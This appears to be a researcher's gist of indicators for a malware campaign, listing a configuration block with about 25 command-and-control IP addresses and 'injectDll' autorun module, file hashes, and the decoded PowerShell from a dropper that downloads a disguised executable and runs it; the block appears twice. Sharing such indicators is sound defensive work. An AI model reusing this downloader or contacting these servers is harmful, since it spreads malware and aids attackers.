herbiezimmerman/gist:a628315d67865ab95b4b52bc36b5798e

## gistfile1.txt
2017-12-06
==========
<mcconf>
	<ver>1000098</ver>
	<gtag>ser0512</gtag>
	<servs>
		<srv>79.106.41.9:449</srv>
		<srv>94.250.252.146:443</srv>
		<srv>62.109.18.206:443</srv>
		<srv>62.109.26.193:443</srv>
		<srv>78.24.223.50:443</srv>
		<srv>94.250.252.162:443</srv>
		<srv>92.53.78.209:443</srv>
		<srv>92.53.66.115:443</srv>
		<srv>62.109.16.70:443</srv>
		<srv>62.109.23.229:443</srv>
		<srv>62.109.17.100:443</srv
		><srv>82.146.47.221:443</srv>
		<srv>195.133.144.43:443</srv>
		<srv>194.87.92.217:443</srv>
		<srv>95.213.194.234:443</srv>
		<srv>195.133.147.44:443</srv>
		<srv>194.87.238.149:443</srv>
		<srv>78.155.206.154:443</srv>
		<srv>185.80.130.195:443</srv>
		<srv>94.250.252.168:443</srv>
		<srv>82.202.236.5:443</srv>
		<srv>185.80.129.158:443</srv>
		<srv>94.250.255.156:443</srv>
		<srv>185.158.114.106:443</srv>
		<srv>94.250.248.173:443</srv>
	</servs>
	<autorun>
		<module name="systeminfo" ctl="GetSystemInfo"/>
		<module name="injectDll"/>
	</autorun>
	</mcconf>

MD5 cfaedwroly.bat = e29a3aaaa40db3c42ee77bacad7adb4b
MD5 tr_fdj-c.exe = a5f5c5e2e94d3d80ca4e15d653db1a44 - https://www.virustotal.com/#/file/294279f9b222dfb98f10d814717ac2f3bf9f683290723f272c4cff984e79a7a3/detection

Code from cfaedwroly.bat:
-------------------------
PowerShell "function Xmd0([String] $pcptsmtuqme){(New-Object System.Net.WebClient).DownloadFile($pcptsmtuqme,'C:\Users\Bill\AppData\Local\Temp\tr_fdj-c.exe');Start-Process 'C:\Users\Bill\AppData\Local\Temp\tr_fdj-c.exe';}try{Xmd0('http://undergroundis[.]com/images/logo[.]png')}catch{Xmd0('http://i]mucg/jmg.]/uoEmaQRlgccuipRcalaEs/l')}
	2017-12-06
	==========
	<mcconf>
	<ver>1000098</ver>
	<gtag>ser0512</gtag>
	<servs>
	<srv>79.106.41.9:449</srv>
	<srv>94.250.252.146:443</srv>
	<srv>62.109.18.206:443</srv>
	<srv>62.109.26.193:443</srv>
	<srv>78.24.223.50:443</srv>
	<srv>94.250.252.162:443</srv>
	<srv>92.53.78.209:443</srv>
	<srv>92.53.66.115:443</srv>
	<srv>62.109.16.70:443</srv>
	<srv>62.109.23.229:443</srv>
	<srv>62.109.17.100:443</srv
	><srv>82.146.47.221:443</srv>
	<srv>195.133.144.43:443</srv>
	<srv>194.87.92.217:443</srv>
	<srv>95.213.194.234:443</srv>
	<srv>195.133.147.44:443</srv>
	<srv>194.87.238.149:443</srv>
	<srv>78.155.206.154:443</srv>
	<srv>185.80.130.195:443</srv>
	<srv>94.250.252.168:443</srv>
	<srv>82.202.236.5:443</srv>
	<srv>185.80.129.158:443</srv>
	<srv>94.250.255.156:443</srv>
	<srv>185.158.114.106:443</srv>
	<srv>94.250.248.173:443</srv>
	</servs>
	<autorun>
	<module name="systeminfo" ctl="GetSystemInfo"/>
	<module name="injectDll"/>
	</autorun>
	</mcconf>

	MD5 cfaedwroly.bat = e29a3aaaa40db3c42ee77bacad7adb4b
	MD5 tr_fdj-c.exe = a5f5c5e2e94d3d80ca4e15d653db1a44 - https://www.virustotal.com/#/file/294279f9b222dfb98f10d814717ac2f3bf9f683290723f272c4cff984e79a7a3/detection

	Code from cfaedwroly.bat:
	-------------------------
	PowerShell "function Xmd0([String] $pcptsmtuqme){(New-Object System.Net.WebClient).DownloadFile($pcptsmtuqme,'C:\Users\Bill\AppData\Local\Temp\tr_fdj-c.exe');Start-Process 'C:\Users\Bill\AppData\Local\Temp\tr_fdj-c.exe';}try{Xmd0('http://undergroundis[.]com/images/logo[.]png')}catch{Xmd0('http://i]mucg/jmg.]/uoEmaQRlgccuipRcalaEs/l')}